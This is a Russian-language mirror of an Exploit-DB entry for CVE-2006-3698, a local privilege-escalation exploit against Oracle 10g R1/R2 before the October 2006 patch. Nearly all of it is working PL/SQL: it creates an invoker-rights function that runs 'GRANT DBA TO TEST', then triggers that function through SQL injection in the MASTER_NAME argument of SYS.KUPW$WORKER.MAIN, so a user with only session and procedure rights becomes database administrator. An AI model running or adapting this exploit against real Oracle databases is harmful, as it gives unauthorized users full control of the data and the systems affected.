- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3178
- Проверка EDB
-
- Пройдено
- Автор
- JOXEAN KORET
- Тип уязвимости
- LOCAL
- Платформа
- MULTIPLE
- CVE
- cve-2006-3698
- Дата публикации
- 2007-01-23
Код:
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <[email protected]>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
select *
from user_role_privs
;
// milw0rm.com [2007-01-23]- Источник
- www.exploit-db.com
